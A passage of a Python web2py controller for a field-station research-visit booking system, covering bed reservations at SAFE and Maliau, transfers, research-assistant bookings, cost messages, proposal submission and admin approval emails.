_class='col-sm-3'),\n DIV(LABEL(INPUT(_type='radio', _name='ra_work_type',\n _value='Rope work', value='Standard'),\n 'Rope work', _class='form-control input-sm'),\n _class='col-sm-3'),\n DIV(LABEL(INPUT(_type='radio', _name='ra_work_type',\n _value='Night work', value='Standard'),\n 'Night work', _class='form-control input-sm'),\n _class='col-sm-3'),\n _class='row'),\n _class='panel-body'),\n # DIV(_class='panel-footer'),\n _class='panel panel-primary')\n\n ra_js = datepicker_script(html_id='ra_datepicker',\n autoclose=\"true\",\n startDate='\"' + record.arrival_date.isoformat() + '\"',\n endDate='\"' + record.departure_date.isoformat() + '\"')\n\n ra_panel = CAT(ra_panel, ra_js)\n\n #\n # NOW BUILD THE TABLES OF THE EXISTING BOOKINGS\n #\n\n # Get the SAFE costs message:\n # - Get the number of beds for malaysian, international and unknown visitors\n # - The query below gets counts for malaysian_researcher is True, False and \n # None (missing)\n # qry = db(db.bed_reservations_safe.research_visit_id == rv_id)\n #\n # rws = qry.select((db.bed_reservations_safe.departure_date - db.bed_reservations_safe.arrival_date).sum(),\n # db.auth_user.malaysian_researcher,\n # db.\n # join = db.research_visit_member.on(\n # db.bed_reservations_safe.research_visit_member_id == db.research_visit_member.id),\n # left = db.auth_user.on(db.research_visit_member.user_id == db.auth_user.id),\n # groupby=db.auth_user.malaysian_researcher)\n\n # Are any SAFE beds booked?\n # if len(rws) > 0:\n # # simplify row data to a dictionary\n # rw_data = {rw.auth_user.malaysian_researcher: rw._extra.values()[0] for rw in rws}\n #\n # # load costs from the json data\n # f = os.path.join(request.folder, 'static', 'info', 'costs.json')\n # costs_dict = simplejson.load(open(f))\n # daily_costs = {True: costs_dict['safe_costs']['local_food']['cost'],\n # False: costs_dict['safe_costs']['food']['cost'],\n # None: costs_dict['safe_costs']['food']['cost']}\n #\n # # get the summary for the message grouped by international, local\n # # add group specific rows.\n # safe_cost_alt = {False: \"International researchers: {:d} person nights at RM {} per night\",\n # True: \"Malaysian researchers: {:d} person nights at RM {} per night\",\n # None: \"Unknowns: {:d} person nights at RM {} per night\"}\n #\n # safe_cost_breakdown = [safe_cost_alt[ky].format(int(rw_data[ky]), daily_costs[ky]) for ky in rw_data]\n #\n # safe_cost_msg = DIV(P(\"With effect from 1st August 2017, accomodation costs for \",\n # \"the SAFE camp \", TAG.u(B(\"must be paid in cash on arrival\")),\n # \". The SAFE accomodation costs for this proposal are \",\n # B(\"RM \" + str(sum([daily_costs[ky] * rw_data[ky] for ky in rw_data]))),\n # \" (\", \", \".join(safe_cost_breakdown), \")\",\n # \". Please ensure you bring this amount with you to camp.\"),\n # _class=\"alert alert-info\", _role=\"alert\")\n # else:\n # safe_cost_msg = DIV()\n\n # E ) Booked SAFE accommodation\n\n # grab the rows joined to the RVM table to get user references and to the\\\n # user table to get International/Malaysian/None (Unknown)\n qry = db(db.bed_reservations_safe.research_visit_id == rv_id)\n\n safe_select = qry.select(join=db.research_visit_member.on(\n db.bed_reservations_safe.research_visit_member_id == db.research_visit_member.id),\n left=db.auth_user.on(db.research_visit_member.user_id == db.auth_user.id))\n\n def pack_safe(r, readonly):\n\n nm = uname(r.research_visit_member.user_id, r.research_visit_member.id)\n delete = del_btn(r.bed_reservations_safe.id, 'delete_safe_', readonly)\n row = TR(TD(nm), TD(r.bed_reservations_safe.arrival_date),\n TD(r.bed_reservations_safe.departure_date), delete)\n\n return row\n\n if len(safe_select) > 0:\n\n # get the total days per group\n days = {False: 0, True: 0, None: 0}\n for rw in safe_select:\n n_days = (\n rw.bed_reservations_safe.departure_date - rw.bed_reservations_safe.arrival_date)\n days[rw.auth_user.malaysian_researcher] += (n_days.days - 1)\n\n # drop empty groups\n days = {ky: vl for ky, vl in days.items() if vl > 0}\n\n # get costs\n f = os.path.join(request.folder, 'static', 'info', 'costs.json')\n costs_dict = simplejson.load(open(f))\n daily_costs = {True: costs_dict['safe_costs']['local_food']['cost'],\n False: costs_dict['safe_costs']['food']['cost'],\n None: costs_dict['safe_costs']['food']['cost']}\n\n # summary text by group\n safe_cost_alt = {\n False: \"International researchers: {:d} person nights at RM {} per night\",\n True: \"Malaysian researchers: {:d} person nights at RM {} per night\",\n None: \"Unknowns: {:d} person nights at RM {} per night\"}\n safe_cost_breakdown = [safe_cost_alt[ky].format(int(days[ky]), daily_costs[ky]) for ky\n in days]\n\n # build the full cost message\n total_cost = sum([daily_costs[ky] * days[ky] for ky in days])\n safe_cost_msg = P(\"With effect from 1st August 2017, accomodation costs for \",\n \"the SAFE camp \", TAG.u(B(\"must be paid in cash on arrival\")),\n \". The SAFE accomodation costs for this proposal are \",\n TAG.u(B(\"RM \" + str(total_cost))),\n \" (\", \", \".join(safe_cost_breakdown), \"). \")\n if total_cost <= 1500:\n safe_cost_msg.append(\"Please ensure you bring this amount with you to camp.\")\n else:\n safe_cost_msg.append(\n (\"You will need to pay RM1500 of this as a deposit on arrival, \"\n \"so please ensure you bring this amount with you to camp. \"\n \"The balance must be paid off over the course of your visit.\"))\n\n safe_table = DIV(DIV(H5('Requested accomodation at SAFE'), _class=\"panel-heading\"),\n TABLE(TR(TH('Visitor'), TH('Arrival date'), TH('Departure date'),\n delete_column_head),\n *[pack_safe(r, readonly) for r in safe_select],\n _class='table table-striped'),\n DIV(safe_cost_msg, _class='panel-body'),\n _class=\"panel panel-primary\")\n else:\n safe_table = DIV()\n safe_cost_msg = \"\"\n\n # F) Booked MALIAU Accommodation\n\n # grab the rows and pack into a table\n maliau_select = db((db.bed_reservations_maliau.research_visit_id == rv_id) &\n (\n db.bed_reservations_maliau.research_visit_member_id == db.research_visit_member.id)).select()\n\n def pack_maliau(r, readonly):\n\n nm = uname(r.research_visit_member.user_id, r.research_visit_member.id)\n delete = del_btn(r.bed_reservations_maliau.id, 'delete_maliau_', readonly)\n row = TR(TD(nm), TD(r.bed_reservations_maliau.arrival_date),\n TD(r.bed_reservations_maliau.departure_date),\n TD(r.bed_reservations_maliau.type),\n TD(['B' if r.bed_reservations_maliau.breakfast else ''] +\n ['L' if r.bed_reservations_maliau.lunch else ''] +\n ['D' if r.bed_reservations_maliau.dinner else '']),\n delete)\n\n return row\n\n if len(maliau_select) > 0:\n # keep this in two parts to reuse in approval emails to MBCA\n maliau_table = TABLE(TR(TH('Visitor'), TH('Arrival date'), TH('Departure date'),\n TH('Type'), TH('Food'), delete_column_head),\n *[pack_maliau(r, readonly) for r in maliau_select],\n _class='table table-striped')\n maliau_div = DIV(DIV(H5('Requested accommodation at Maliau'), _class=\"panel-heading\"),\n maliau_table,\n _class=\"panel panel-primary\")\n else:\n maliau_div = DIV()\n\n # G) Booked transfers\n\n # grab the rows and pack into a table\n transfer_select = db((db.transfers.research_visit_id == rv_id) &\n (\n db.transfers.research_visit_member_id == db.research_visit_member.id)).select()\n\n def pack_transfer(r, readonly):\n\n nm = uname(r.research_visit_member.user_id, r.research_visit_member.id)\n delete = del_btn(r.transfers.id, 'delete_transfer_', readonly)\n row = TR(TD(nm), TD(r.transfers.transfer), TD(r.transfers.transfer_date), delete)\n\n return row\n\n if len(transfer_select) > 0:\n transfer_table = DIV(DIV(H5('Requested Site Transfers'), _class=\"panel-heading\"),\n TABLE(TR(TH('Visitor'), TH('Transfer'), TH('Transfer date'),\n delete_column_head),\n *[pack_transfer(r, readonly) for r in transfer_select],\n _class='table table-striped'),\n _class=\"panel panel-primary\")\n else:\n transfer_table = DIV()\n\n # H) Booked research assistants\n res_assist_select = db(db.research_assistant_bookings.research_visit_id == rv_id).select()\n\n def pack_ra(r, readonly):\n\n delete = del_btn(r.id, 'delete_ra_', readonly)\n row = TR(TD(r.site_time), TD(r.start_date), TD(r.finish_date), TD(r.work_type), delete)\n\n return row\n\n if len(res_assist_select) > 0:\n ra_table = DIV(DIV(H5('Requested Research Assistant support'), _class=\"panel-heading\"),\n TABLE(TR(TH('Details'), TH('Start date'), TH('Finish date'),\n TH('Work type'), delete_column_head),\n *[pack_ra(r, readonly) for r in res_assist_select],\n _class='table table-striped'),\n _class=\"panel panel-primary\")\n else:\n ra_table = DIV()\n\n # I) SUBMIT BUTTON PANEL \n\n # switch the button class from active to inactive based on\n # number of researchers named and at least some accomodation\n number_of_visitors = db(db.research_visit_member.research_visit_id == rv_id).count()\n nights_at_safe = db(db.bed_reservations_safe.research_visit_id == rv_id).count()\n nights_at_maliau = db(db.bed_reservations_maliau.research_visit_id == rv_id).count()\n\n if number_of_visitors and (nights_at_safe + nights_at_maliau):\n submit_proposal_button = TAG.BUTTON('Submit proposal', _type='submit',\n _name='submit_proposal',\n _class='btn btn-success btn-md active')\n submit_panel_text = P(\n 'Double check you have listed all of the researchers coming to the '\n 'field and provided details of all accommodation, transfers and RA '\n ' support needed and then press the button below to submit your proposal.',\n _style='padding: 3px 10px 3px 10px;')\n else:\n submit_proposal_button = TAG.BUTTON('Enter details to submit', _type='submit',\n _name='submit_proposal',\n _class='btn btn-success btn-md disabled',\n _disabled='disabled')\n submit_panel_text = P(\n 'You have not identified any researchers taking part in the research visit '\n 'or requested any accommodation. You will not be able to submit your proposal '\n 'until you provide the details listed at the top of the page.',\n _style='padding: 3px 10px 3px 10px;')\n\n submit_panel = DIV(DIV(DIV(submit_panel_text, _class='row'),\n DIV(CENTER(submit_proposal_button), _class='row'),\n _class='panel-body'),\n _class='panel panel-primary')\n\n #\n # SECTION 4) EXPOSE THE DETAILS (AND CONTROLS IF NOT READONLY)\n # AND PROVIDE THE FORM LOGIC FOR HANDLING THE VARIOUS CONTROLS\n\n if readonly:\n console = CAT(H3('Proposed research visit details'),\n DIV(visitors),\n DIV(safe_table),\n DIV(maliau_div),\n DIV(transfer_table),\n DIV(ra_table))\n\n else:\n # combine the panels into a single form, along with a hidden field containing\n # the research visit id to allow the validation to cross check.\n # - insert anchors between panels to bring the URL back to the pane that was edited\n\n # add a big banner warning about draft status\n if record.admin_status == 'Draft':\n draft_banner = DIV(H4('Warning: Draft proposal'), (\"This is currently \"\n \"a draft research visit proposal, allowing you to come back \"\n \"to edit and update the details. Once you have finished the \"\n \"proposal you \"),\n TAG.U('must press the submit button '), ('below. '\n \"The admin team will not see your proposal until it is submitted \"\n \"and your proposal must be submitted and approved before you come \"\n \"to the field.\"),\n _class=\"alert alert-info\", _style='background:gray',\n _role=\"alert\")\n\n else:\n draft_banner = DIV()\n\n console = FORM(A(_name='console'),\n H3('Proposed research visit details'),\n draft_banner,\n DIV(DIV(visitors, _class='col-sm-5'),\n DIV(DIV(accom_test, _class='row'),\n DIV(transfers_panel, _class='row'),\n DIV(ra_panel, _class='row'),\n _class='col-sm-7'),\n _class='row'),\n DIV(safe_table),\n DIV(maliau_div),\n DIV(transfer_table),\n DIV(ra_table),\n draft_banner,\n DIV(submit_panel),\n INPUT(_name='id', _id='id', _value=rv_id, _type='hidden'),\n _id='console')\n\n # console validation\n if console.process(onvalidation=validate_research_visit_details_console,\n formname='console').accepted:\n\n # intialise a list to gather history for changes\n new_history = []\n\n # add user and project share the same code, so create a local function\n def add_user(uid):\n\n new_id = db.research_visit_member.insert(research_visit_id=rv_id,\n user_id=uid)\n # update the history\n record = db.research_visit_member(new_id)\n name = uname(record.user_id, record.id)\n new_history = ' -- New visitor added: {}\\\\n'.format(name)\n\n return (new_history)\n\n # --------------------------------\n # The action to take gets identified by the validator and stored \n # in the form as console.action\n # --------------------------------\n\n if console.action == 'delete':\n # --------------------------------\n # The user has pressed one of the delete buttons and \n # there is a delete component to the form giving the table \n # and row id to be deleted \n # --------------------------------\n\n table_dict = {'transfer': 'transfers',\n 'visitor': 'research_visit_member',\n 'safe': 'bed_reservations_safe',\n 'maliau': 'bed_reservations_maliau',\n 'ra': 'research_assistant_bookings'}\n\n # get the information formatted\n del_type = console.delete[0]\n del_tab = table_dict[del_type]\n del_id = int(console.delete[1])\n\n # if not an RA booking, look up the name of the RVM\n if del_type == 'visitor':\n r = db(db.research_visit_member.id == del_id).select().first()\n name = uname(r.user_id, r.id)\n elif del_type != 'ra':\n r = db(\n (db.research_visit_member.id == db[del_tab].research_visit_member_id) &\n (db[del_tab].id == del_id)).select().first()\n name = uname(r.research_visit_member.user_id, r.research_visit_member.id)\n\n # delete the record\n del_record = db[del_tab][del_id]\n del_record.delete_record()\n\n # get the history \n if del_type == 'ra':\n new_history.append(' -- RA cancelled {} from {} to {}\\\\n'.format(\n del_record.site_time, del_record.start_date, del_record.finish_date))\n elif del_type == 'transfer':\n new_history.append(' -- Transfer cancelled for {} from {} on {}\\\\n'.format(\n name, del_record.transfer, del_record.transfer_date))\n elif del_type == 'visitor':\n new_history.append(' -- Visitor removed: {}\\\\n'.format(name))\n elif del_type == 'accom_safe':\n new_history.append(\n ' -- SAFE bed cancelled for {} between {} - {} \\\\n'.format(\n name, del_record.arrival_date, del_record.departure_date))\n elif del_type == 'accom_safe':\n new_history.append(\n ' -- Maliau bed cancelled for {} between {} - {} \\\\n'.format(\n name, del_record.arrival_date, del_record.departure_date))\n\n # --------------------------------\n # THREE (NON-DELETE) ACTIONS THAT AMEND THE VISITORS\n # --------------------------------\n\n elif console.action == 'add_visitor':\n\n new_history.append(add_user(console.vars.user))\n\n elif console.action == 'add_project':\n\n for uid in console.vars.user:\n new_history.append(add_user(uid))\n\n elif console.action == 'replace_visitor':\n\n # the current and replacement user ids are passed \n # from the validator in console.vars.user as a 2-list:\n # [row id in research_visit_member to update, user_id to insert]\n\n rvm_record = db.research_visit_member(console.vars.user[0])\n old_name = uname(rvm_record.user_id, rvm_record.id)\n\n replace_uid = console.vars.user[1]\n replace_uid = None if replace_uid == 0 else replace_uid\n rvm_record.update_record(user_id=replace_uid)\n rvm_record = db.research_visit_member(console.vars.user[0])\n new_name = uname(rvm_record.user_id, rvm_record.id)\n\n # TODO - could potentially merge reservation records here\n\n # update the history\n new_history.append(\n ' -- Visitor replaced: {} >> {}\\\\n'.format(old_name, new_name))\n\n # --------------------------------\n # TWO ACTIONS THAT BOOK ACCOMODATION\n # --------------------------------\n\n elif console.action == 'reserve_beds':\n\n # loop over research_visit_member_ids, creating a dict of fields to insert\n # via the __book_beds function\n for rid in console.vars.records:\n\n rvm_record = db.research_visit_member(rid)\n name = uname(rvm_record.user_id, rvm_record.id)\n\n flds = dict(arrival_date=console.vars.accom_arrive,\n departure_date=console.vars.accom_depart,\n research_visit_id=rv_id,\n research_visit_member_id=rid)\n\n if console.vars.location == 'SAFE':\n\n __book_beds(site_table='bed_reservations_safe', flds=flds)\n\n new_history.append(' -- SAFE bed booked for {} from {} to {}\\\\n'.format(\n name, console.vars.accom_arrive, console.vars.accom_depart))\n\n else:\n flds.update(dict(type=console.vars.maliau_type,\n breakfast=console.vars.maliau_breakfast,\n lunch=console.vars.maliau_lunch,\n dinner=console.vars.maliau_dinner))\n\n __book_beds(site_table='bed_reservations_maliau', flds=flds)\n\n new_history.append(\n ' -- Maliau bed booked for {} from {} to {} \\\\n'.format(\n name, console.vars.accom_arrive, console.vars.accom_depart))\n\n elif console.action == 'release_beds':\n\n # loop over research_visit_member_ids, creating a dict of fields to process\n # via the __book_beds function\n\n for rid in console.vars.records:\n\n rvm_record = db.research_visit_member(rid)\n name = uname(rvm_record.user_id, rvm_record.id)\n\n flds = dict(arrival_date=console.vars.accom_arrive,\n departure_date=console.vars.accom_depart,\n research_visit_member_id=rid)\n\n if console.vars.location == 'SAFE':\n __release_beds(site_table='bed_reservations_safe', flds=flds)\n new_history.append(\n ' -- SAFE beds released for {} between {} to {}\\\\n'.format(\n name, console.vars.accom_arrive, console.vars.accom_depart))\n else:\n __release_beds(site_table='bed_reservations_maliau', flds=flds)\n new_history.append(\n ' -- Maliau beds released for {}, {} between {} to {} \\\\n'.format(\n name, console.vars.accom_arrive, console.vars.accom_depart))\n\n # --------------------------------\n # ACTION TO BOOK TRANSFERS\n # --------------------------------\n\n elif console.action == 'book_transfer':\n\n # loop over selected rows from user panel and book transfers\n for rid in console.vars.records:\n rvm_record = db.research_visit_member(rid)\n\n db.transfers.insert(transfer=console.vars.transfer,\n research_visit_id=rv_id,\n research_visit_member_id=rid,\n transfer_date=console.vars.transfer_datepicker)\n\n name = uname(rvm_record.user_id, rvm_record.id)\n new_history.append(' -- Transfer booked for {} from {} on {}\\\\n'.format(\n name, console.vars.transfer, console.vars.transfer_datepicker))\n\n # --------------------------------\n # ACTION TO BOOK RAs\n # --------------------------------\n elif console.action == 'book_res_assist':\n\n ropework = (\n (console.vars.ra_rope is not None) and (console.vars.ra_rope == 'on'))\n nightwork = (\n (console.vars.ra_night is not None) and (console.vars.ra_night == 'on'))\n\n db.research_assistant_bookings.insert(research_visit_id=rv_id,\n start_date=console.vars.ra_start,\n finish_date=console.vars.ra_end,\n site_time=console.vars.ra_site_time,\n work_type=console.vars.ra_work_type)\n\n new_history.append(' -- RA booked: {} from {} to {}\\\\n'.format(\n console.vars.ra_site_time, console.vars.ra_start,\n console.vars.ra_end))\n # --------------------------------\n # SUBMIT \n # --------------------------------\n elif console.action == 'submit_proposal':\n\n # i) update the history, change the status and redirect\n hist_str = '[{}] {} {}\\\\n -- Proposal submitted\\\\n'\n new_history = hist_str.format(\n datetime.datetime.utcnow().strftime('%Y-%m-%dT%H:%MZ'),\n auth.user.first_name,\n auth.user.last_name) + record.admin_history\n\n record.update_record(admin_status='Submitted',\n admin_history=new_history)\n\n # ii) email the proposer\n safe_mailer(to=auth.user.email,\n subject='SAFE: research visit proposal submitted',\n template='research_visit_submitted.html',\n template_dict={'name': auth.user.first_name,\n 'url': URL('research_visits',\n 'research_visit_details',\n args=[visit.vars.id], scheme=True,\n host=True)})\n\n session.flash = CENTER(B('Research visit proposal submitted.'),\n _style='color: green')\n\n else:\n # datechange causes a processing event that doesn't do anything\n pass\n\n # update the RV record to catch history changes\n if len(new_history) > 0:\n history_update = '[{}] {} {}\\\\n'.format(\n datetime.datetime.utcnow().strftime('%Y-%m-%dT%H:%MZ'),\n auth.user.first_name,\n auth.user.last_name)\n history_update += ''.join(new_history)\n if record.admin_history is not None:\n history_update += record.admin_history\n else:\n history_update = record.admin_history\n record.update_record(admin_history=history_update)\n\n # reload the page to update changes\n redirect(URL('research_visit_details', args=rv_id, anchor='console'))\n\n elif console.errors:\n\n session.flash = console.errors\n\n # return the visit history\n if rv_id is not None and record.admin_history is not None:\n history = XML(record.admin_history.replace('\\\\n', '
    '), sanitize=True,\n permitted_tags=['br/'])\n history = CAT(A(_name='history'),\n DIV(DIV(H5('Research visit history'), _class=\"panel-heading\"),\n DIV(history, _class='panel_body',\n _style='margin:10px 10px;height:100px;overflow-y:scroll'),\n DIV(_class='panel-footer'),\n _class=\"panel panel-primary\"))\n else:\n history = DIV()\n\n # If the visit record has been created and an admin is viewing, expose the \n # decision panel\n if rv_id is not None and auth.has_membership('admin') and record.admin_status == 'Submitted':\n\n admin = admin_decision_form(selector_options=['Resubmit', 'Approved'])\n\n if admin.process(formname='admin').accepted:\n\n # update record with decision\n admin_str = '[{}] {} {}\\\\n ** Decision: {}\\\\n ** Comments: {}\\\\n'\n new_history = admin_str.format(datetime.datetime.utcnow().strftime('%Y-%m-%dT%H:%MZ'),\n auth.user.first_name,\n auth.user.last_name,\n admin.vars.decision,\n admin.vars.comment) + record.admin_history\n\n record.update_record(admin_status=admin.vars.decision,\n admin_history=new_history)\n\n # Email decision\n proposer = record.proposer_id\n template_dict = {'name': proposer.first_name,\n 'url': URL('research_visits', 'research_visit_details',\n args=[rv_id], scheme=True, host=True),\n 'admin': auth.user.first_name + ' ' + auth.user.last_name,\n 'safe_cost_msg': safe_cost_msg}\n\n # pick an decision\n if admin.vars.decision == 'Approved':\n\n # send email message to the proposer, deputy, searrp accounts and FRM\n frm = get_frm()\n frm = [eml for eml in [frm.alternative_email, frm.email] if eml is not None]\n \n safe_mailer(to=proposer.email,\n cc=['deputy.coord@safeproject.net', 'account@searrp.org'] + frm,\n subject='SAFE: research visit proposal approved',\n template='research_visit_approved.html',\n template_dict=template_dict)\n\n # Also email MBCA with any requests for Maliau booking\n if len(maliau_select) > 0:\n\n # reuse the maliau table\n if proposer.title in ['', None, ' ', 'None']:\n proposer_name = \" \".join((proposer.first_name, proposer.last_name))\n else:\n proposer_name = \" \".join(\n (proposer.title, proposer.first_name, proposer.last_name))\n\n maliau_email_dict = {'count': len(maliau_select),\n 'maliau_table': maliau_table,\n 'proposer_name': proposer_name}\n \n safe_mailer(to='roserlie5@gmail.com',\n cc=[proposer.email, 'inid69@yahoo.com', 'jarizul.gjule@gmail.com', \n 'deputy.coord@safeproject.net'] + frm,\n reply_to=proposer.email,\n subject='Request for accommodation from the SAFE Project',\n template='maliau_beds_email.html',\n template_dict=maliau_email_dict)\n\n elif admin.vars.decision == 'Resubmit':\n\n safe_mailer(to=proposer.email,\n subject='SAFE: research visit proposal requires resubmission',\n template='research_visit_resubmit.html',\n template_dict=template_dict)\n\n # reload the page to update changes\n redirect(URL('research_visits', 'research_visit_details', args=rv_id, anchor='history'))\n\n else:\n admin = DIV()\n\n return dict(visit_record=record, visit=visit, console=console,\n history=history, admin=admin, icons=icons)\n\n\n@auth.requires_membership('admin')\ndef create_late_research_visit():\n \"\"\"\n Process to create an RV for a late booking user.\n This allows an admin to create an RV that then belongs to that user\n \"\"\"\n\n # Two possible entry points:\n # - Completely new RV request(bare URL)\n # - Project specified for new RV request (project_id as a variable, but no record)\n\n new_rv_project_requested = request.vars['new']\n\n if new_rv_project_requested is not None and new_rv_project_requested != '0':\n new_project_record = db.project_id(new_rv_project_requested)\n if new_project_record is None:\n session.flash = B(CENTER('Invalid new visit project reference'), _style='color:red;')\n redirect(URL('research_visits', 'create_late_research_visit'))\n else:\n new_project_record = None\n\n # provide either a project drop down or a RV details form\n if new_rv_project_requested is None:\n\n # Bare URL submitted: provide a list of available projects + look see visit\n # and redirect back to the page, with the new project_id for the next step\n proj_query = db((db.project_id.id > 0) &\n (db.project_id.project_details_id == db.project_details.id))\n rows = proj_query.select(db.project_details.project_id, db.project_details.title)\n available_project_ids = [r.project_id for r in rows]\n available_project_titles = [r.title for r in rows]\n\n project_selector = SELECT(OPTION('Look see visit', _value='0'),\n *[OPTION(title, _value=pid) for title, pid in\n zip(available_project_titles, available_project_ids)],\n _class='form-control', _name='project_selector')\n\n visit = FORM(DIV(DIV(H5('Research visit summary'), _class=\"panel-heading\"),\n DIV(DIV(LABEL('Choose project:', _class=\"control-label col-sm-2\"),\n DIV(project_selector, _class=\"col-sm-8\"),\n TAG.BUTTON('Select', _style=\"padding: 5px 15px\", _class='col-sm-2',\n _type='submit', _name='submit_project_select'),\n _class='row', _style='margin:10px 10px'),\n _class='panel_body'),\n _class=\"panel panel-primary\"))\n\n if visit.validate():\n # reload the URL with the id of the new project as a variable\n redirect(URL('research_visits', 'create_late_research_visit',\n vars={'new': visit.vars.project_selector}))\n\n else:\n\n # Now have a URL with a project requested as a variable 'research_visit_details?new='866' \n buttons = [TAG.button('Create proposal', _type=\"submit\",\n _name='save_proposal', _style='padding: 5px 15px 5px 15px;')]\n\n # get the project details\n if new_rv_project_requested != '0':\n\n # get the title\n pid = int(new_rv_project_requested)\n proj_row = db((db.project_id.id == pid) & (\n db.project_id.project_details_id == db.project_details.id))\n project_details = proj_row.select().first()\n proj_title = project_details.project_details.title\n\n # restrict the proposer id to possible coordinators\n coords = db((db.auth_user.id == db.project_members.user_id) &\n (db.project_members.project_id == pid) &\n (db.project_members.is_coordinator == 'True'))\n db.research_visit.proposer_id.requires = IS_IN_DB(coords, db.auth_user.id,\n '%(last_name)s, %(first_name)s',\n zero=None)\n else:\n project_details = None\n proj_title = 'Look see visit'\n\n # Use SQLFORM for DB input\n visit = SQLFORM(db.research_visit,\n fields=['title', 'arrival_date',\n 'departure_date', 'purpose',\n 'licence_details', 'proposer_id'],\n buttons=buttons,\n showid=False)\n\n # process the visit form to create hidden fields and to process input\n if visit.process().accepted:\n\n # insert the project_id, but not if this is a look see visit\n if new_rv_project_requested != '0':\n db.research_visit(visit.vars.id).update_record(project_id=new_rv_project_requested)\n\n # email the identified coordinator the link for the page\n proposer = db.auth_user[visit.vars.proposer_id]\n safe_mailer(to=proposer.email,\n subject='SAFE: draft short notice research visit proposal created on your behalf',\n template='research_visit_created.html',\n template_dict={'name': auth.user.first_name,\n 'url': URL('research_visits', 'research_visit_details',\n args=[visit.vars.id], scheme=True, host=True)})\n\n db.research_visit(visit.vars.id).update_record(admin_status='Draft',\n admin_history='Draft proposal created: {}'.format(\n datetime.datetime.utcnow().strftime(\n '%Y-%m-%dT%H:%MZ')))\n session.flash = CENTER(B('Research visit proposal created'), _style='color: green')\n\n redirect(URL('research_visits', 'research_visit_details', args=visit.vars.id))\n else:\n\n pass\n\n # Now repackage the form into a custom DIV\n # edit form widgets - notably, override the default date widget classes to allow\n # them to use the daterange datepicker\n visit.custom.widget.purpose['_rows'] = 4\n visit.custom.widget.arrival_date['_class'] = \"form-control input-sm\"\n visit.custom.widget.departure_date['_class'] = \"form-control input-sm\"\n\n proj_row = DIV(LABEL('Project title:', _class=\"control-label col-sm-2\"),\n DIV(proj_title, _class=\"col-sm-10\"),\n _class='row', _style='margin:10px 10px')\n\n # javascript to run the datepicker without date constraints\n visit_js = datepicker_script(html_id='visit_datepicker',\n autoclose='true',\n startDate='\"\"',\n endDate='\"\"')\n\n visit = FORM(DIV(DIV(DIV(H5('Research visit summary', _class='col-sm-9'), _class='row',\n _style='margin:0px 0px'),\n _class=\"panel-heading\"),\n DIV(visit.custom.begin, proj_row,\n DIV(LABEL('Visit title:', _class=\"control-label col-sm-2\"),\n DIV(visit.custom.widget.title, _class=\"col-sm-10\"),\n _class='row', _style='margin:10px 10px'),\n DIV(LABEL('Coordinator:', _class=\"control-label col-sm-2\"),\n DIV(visit.custom.widget.proposer_id, _class=\"col-sm-10\"),\n _class='row', _style='margin:10px 10px'),\n DIV(LABEL('Dates:', _class=\"control-label col-sm-2\"),\n DIV(DIV(visit.custom.widget.arrival_date,\n SPAN('to', _class=\"input-group-addon input-sm\"),\n visit.custom.widget.departure_date,\n _class=\"input-daterange input-group\",\n _id=\"visit_datepicker\"),\n _class='col-sm-10'),\n _class='row', _style='margin:10px 10px'),\n DIV(LABEL('Purpose:', _class=\"control-label col-sm-2\"),\n DIV(visit.custom.widget.purpose, _class=\"col-sm-10\"),\n _class='row', _style='margin:10px 10px'),\n DIV(DIV(visit.custom.submit, _class=\"col-sm-10 col-sm-offset-2\"),\n _class='row', _style='margin:10px 10px'),\n visit.custom.end,\n _class='panel_body'),\n _class=\"panel panel-primary\"),\n visit_js)\n\n return dict(visit=visit)\n\n\ndef validate_research_visit_details(form):\n \"\"\"\n This controller checks the form that creates the initial RV entry\n \"\"\"\n\n # populate the proposer_id if this is a new entry (form has no record)\n if form.record is None:\n form.vars.proposer_id = auth.user.id\n form.vars.proposal_date = datetime.datetime.utcnow().isoformat()\n form.vars.admin_history = '[{}] {} {}\\\\n -- {}\\\\n'.format(\n datetime.datetime.utcnow().strftime('%Y-%m-%dT%H:%MZ'),\n auth.user.first_name,\n auth.user.last_name,\n 'Research visit proposal created.')\n\n # check the arrival date is more than a fortnight away\n deadline = datetime.date.today() + datetime.timedelta(days=14)\n if form.vars.arrival_date < deadline and not auth.has_membership('admin'):\n form.errors.arrival_date = '14 days notice required. Arrival date must be later than {}.'.format(\n deadline.isoformat())\n\n # check the departure date is after the arrival date\n # TODO - think about day visits\n if form.vars.arrival_date >= form.vars.departure_date:\n form.errors.departure_date = 'The departure date must be later than the arrival date'\n\n\ndef validate_research_visit_details_console(form):\n \"\"\"\n This function checks the wide range of actions available\n from the panels for a created RV - all the panels form one\n big form that share the visitor selection checkboxes so\n there are multiple submit buttons that use the information\n in the console form in different ways\n \"\"\"\n\n # the request captures the datechange hidden field and \n # the name of any submit button pressed\n request_keys = list(request.vars.keys())\n\n # retrieve the record for the related visit\n rv = db.research_visit(form.vars.id)\n\n # sanitize the visitor row selectors, which can be\n # - missing (none selected) \n # - a single string (one selected)\n # - a list of strings (2+ selected)\n # so convert to a consistent list and make strings into numbers\n if form.vars.records is None:\n form.vars.records = []\n elif type(form.vars.records) is str:\n form.vars.records = [int(form.vars.records)]\n else:\n form.vars.records = [int(x) for x in form.vars.records]\n\n # Two kinds of actions (delete_XXX and replace_visitor) operate\n # via submit buttons encoding row ids. These submit an empty value\n # but have a key name of format: delete_rowtype_rowid\n # e.g. delete_transfer_47 is a request to delete the transfer record\n # with id 47 \n\n form.action = None\n\n for k in request_keys:\n if \"delete_\" in k:\n\n form.action = 'delete'\n form.delete = k.split('_')[1:]\n\n elif \"replace\" in k:\n\n form.action = 'replace_visitor'\n form.vars.user = [int(k.split('_')[2]), int(form.vars.user)]\n\n # if no delete/replace action then look for other actions simply by matching strings\n if form.action is None:\n\n # list of submit buttons (and one hidden action)\n submit_ids = set([\"add_visitor\", \"add_project\",\n \"reserve_beds\", \"release_beds\", \"book_transfer\",\n \"book_res_assist\", \"submit_proposal\", 'datechange'])\n\n action = list(submit_ids.intersection(request_keys))\n\n # check for oddities and pass the action back across to the processing actions\n if (len(action) != 1):\n form.errors = 'Error with action identification.'\n else:\n action = action[0]\n form.action = action\n\n # catching and checking dates\n # - onchange event for dates triggers a submit with a hidden datechange field\n # that we can intercept\n if action == 'datechange':\n\n # store the dates as datetime objects\n arrival_datetime = datetime.datetime.strptime(form.vars.arrival_date, '%Y-%m-%d').date()\n departure_datetime = datetime.datetime.strptime(form.vars.departure_date,\n '%Y-%m-%d').date()\n\n deadline = datetime.date.today() + datetime.timedelta(days=14)\n\n # check arrival date and departure date separately to allow defaults on each independently\n if arrival_datetime < deadline:\n # check the from date is more than a fortnight away\n form.errors.arrival_date = '14 days notice required for all bookings. Must be later than {}.'.format(\n deadline.isoformat())\n elif arrival_datetime < 